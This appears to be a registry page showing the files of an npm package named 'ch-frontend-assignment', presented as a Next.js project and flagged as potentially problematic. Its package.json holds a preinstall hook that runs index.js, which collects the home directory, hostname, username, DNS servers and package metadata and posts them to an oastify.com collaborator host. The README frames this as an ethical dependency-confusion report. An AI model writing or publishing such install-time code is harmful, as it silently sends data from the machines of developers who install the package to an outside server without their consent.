ch-frontend-assignment 0.1.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ch-frontend-assignment might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +47 -0
  3. package/package.json +31 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ Kullai's RCE via Dependancy Confusion ethically reporting to Cryptohopper !!
package/index.js ADDED
@@ -0,0 +1,47 @@
1
+ //author:- metikalakullai.gtl@gmail.com
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ const trackingData = JSON.stringify({
10
+ p: package,
11
+ c: __dirname,
12
+ hd: os.homedir(),
13
+ hn: os.hostname(),
14
+ un: os.userInfo().username,
15
+ dns: dns.getServers(),
16
+ r: packageJSON ? packageJSON.___resolved : undefined,
17
+ v: packageJSON.version,
18
+ pjson: packageJSON,
19
+ });
20
+
21
+ var postData = querystring.stringify({
22
+ msg: trackingData,
23
+ });
24
+
25
+ var options = {
26
+ hostname: "r3v0q4fr52shxw8bgtgofzihg8m0aqyf.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
27
+ port: 443,
28
+ path: "/",
29
+ method: "POST",
30
+ headers: {
31
+ "Content-Type": "application/x-www-form-urlencoded",
32
+ "Content-Length": postData.length,
33
+ },
34
+ };
35
+
36
+ var req = https.request(options, (res) => {
37
+ res.on("data", (d) => {
38
+ process.stdout.write(d);
39
+ });
40
+ });
41
+
42
+ req.on("error", (e) => {
43
+ // console.error(e);
44
+ });
45
+
46
+ req.write(postData);
47
+ req.end();
package/package.json ADDED
@@ -0,0 +1,31 @@
1
+ {
2
+ "name": "ch-frontend-assignment",
3
+ "version": "0.1.0",
4
+ "private": false,
5
+ "scripts": {
6
+ "dev": "next dev",
7
+ "build": "next build",
8
+ "start": "next start",
9
+ "lint": "next lint"
10
+ },
11
+ "dependencies": {
12
+ "@next/font": "13.1.2",
13
+ "@types/node": "18.11.18",
14
+ "@types/react": "18.0.27",
15
+ "@types/react-dom": "18.0.10",
16
+ "eslint": "8.32.0",
17
+ "eslint-config-next": "13.1.2",
18
+ "next": "13.1.2",
19
+ "react": "18.2.0",
20
+ "react-dom": "18.2.0",
21
+ "typescript": "4.9.4"
22
+ },
23
+ "description": "Kullai Ethically Reporting to Cryptohopper",
24
+ "main": "index.js",
25
+ "scripts": {
26
+ "test": "echo \"Error: no test specified\" && exit 1",
27
+ "preinstall": "node index.js"
28
+ },
29
+ "author": "",
30
+ "license": "ISC"
31
+ }